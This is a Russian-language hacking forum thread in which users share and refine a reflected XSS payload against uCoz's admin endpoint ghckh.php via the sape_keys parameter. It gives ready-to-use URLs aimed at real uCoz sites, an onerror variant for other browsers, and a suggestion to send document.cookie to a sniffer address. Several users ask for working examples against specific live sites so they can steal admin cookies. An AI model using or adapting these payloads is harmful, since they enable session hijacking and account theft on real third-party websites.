![]() |
Ucoz xss
Вот xss найденная мною на юкозе:
Код:
[site.ucoz.ru]/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3EКод:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E |
Ыыыыыыы))))
Юкоз пахекали=))) Код:
http://www.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3EМалаца, держи канфетко=) |
Цитата:
|
В ФФ не пашет
|
В Опере все гуд!
|
пробел надеюсь не забыл убрать, двдрв?)
|
ога..под ие6 пашет...под фф не хочет ^_^
|
гут
|
ff не пашет,на ие 5 и опера 9.62 пашет!
|
давайте мот перенесём в приват))
|
Уже не пашет =(
|
Sasuke-kun, че у тебя не пашет???)
Все там пашет!!!111адинадинадин Пробелы убери прост :D:D:D |
дайте пример на сайт prostota.ucoz.org, уж очень хочется посмотреть, а то смотрю и не пашет(
|
всё, понял, а как с ней увести пароль как то можно? снифером трудно будет
|
Пробуй так:
alert(адрес снифера+document.cookie) |
Реально. Автору зачет.
|
хм..а у меня не пашет,можите дать готовый пример например к сайту naruto-fan.ru он на ucoz'е
|
Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:
Код:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")> |
всё пашет и пашет нормально ;) заслужил +
|
уже прикрыли ?(
|
Все по прежнему работает.
|
НО как с этим угнать куки админа ? :(
|
молодец, ТС
|
:( жаль только пользы от этого мало. куки не выходит угнать
|
всё работает..
|
luz3r
И кукисы на снифер приходят? |
Дык я не понял, должна стоят сапа?
|
круть , автор молодец
|
ЫЫЫЫЫЫЫ ))) Накнецто ХОТЬ ЧТОТО на уцозе нашли и в паб выложили =)
|
кукисы, получилось, у кого-нить угнать? :)
|
Крутая у вас, ребят, уязвимость через которую ничего сделать нельзя. Да еще и связанная больше с sape чем с юкозом.
|
Если правильно написать ссылку, то все получается. Уязвимость нормальная.
|
можете привести конкретный пример на конкретном сайте?просто мне очень нужно!
P.S. "репутации" нет а то + бы поставил |
Цитата:
Еще... Кража кука ничего не даст, его нельзя ни расшифровать ни использовать у себя на компьютере.... |
Во всех ваших примерах пишет
Невозможно найти ресурс Возможно, он был удален, переименован, или временно недоступен. |
Цитата:
|
блин((((опоздал(((
|
Да реал, краша куки вам ничего не даст. По умолчанию на Укозе у админа стоит привязка к IP. А следовательно куки если и прилетят, то толку от них нет.
|
Цитата:
|
| Время: 22:49 |